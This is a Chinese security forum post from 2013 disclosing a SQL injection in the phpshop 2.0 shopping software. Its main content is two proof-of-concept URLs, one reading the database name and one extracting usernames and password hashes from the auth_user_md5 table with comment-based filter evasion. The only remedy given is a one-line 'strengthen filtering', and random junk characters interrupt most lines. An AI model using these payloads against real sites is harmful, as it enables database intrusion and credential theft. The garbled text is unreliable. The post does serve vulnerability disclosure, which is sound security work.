中国网络渗透测试联盟

标题: phpshop 2.0 SQL注入及修复 [打印本页]
作者: admin    时间: 2013-1-18 18:24
标题: phpshop 2.0 SQL注入及修复
标题 : phpshop 2.0 SQL Injection Vulnerability
0 }: C( m3 c' C8 v4 {2 d3 v/ C& J! s- w1 d7 N* A
作者 : By onestree6 V: W" G4 B6 V9 i4 d, u9 `
下载地址 : http://code.google.com/p/phpshop/downloads/list
3 M2 `5 _6 O2 R) r* i测试地址: windows 7 / ubuntu8 y3 N- M3 J$ w' F
7 F- s6 X+ E% a: G+ B1 u
, @" C8 U3 k) J) q! @9 o! k
SQLi p0c:7 x# ^, L% r- i: {) d. m
, @9 R( x& O% s# D+ v8 n4 R& s
==================. c2 e: c% D. j
/ A% z* D+ z* f0 R( s* y5 o( K+ O
http://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'( i4 A6 M, q! @# `* Z& L
union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --* Y8 P* k- ^2 U* J4 ?5 ~$ M

( r6 \$ d5 h& M$ Fhttp://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
& B( V5 @  ~$ s5 U* K4 y( G" U
% ~% U# F1 C0 b/ ~, a- i修复:
3 R& J* v5 x5 e- y; S% r加强过滤
2 [/ p% O- [4 Z  y6 ?( v" y- g, a5 w1 f" u( s
. s0 R( n8 _6 \" w; W




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2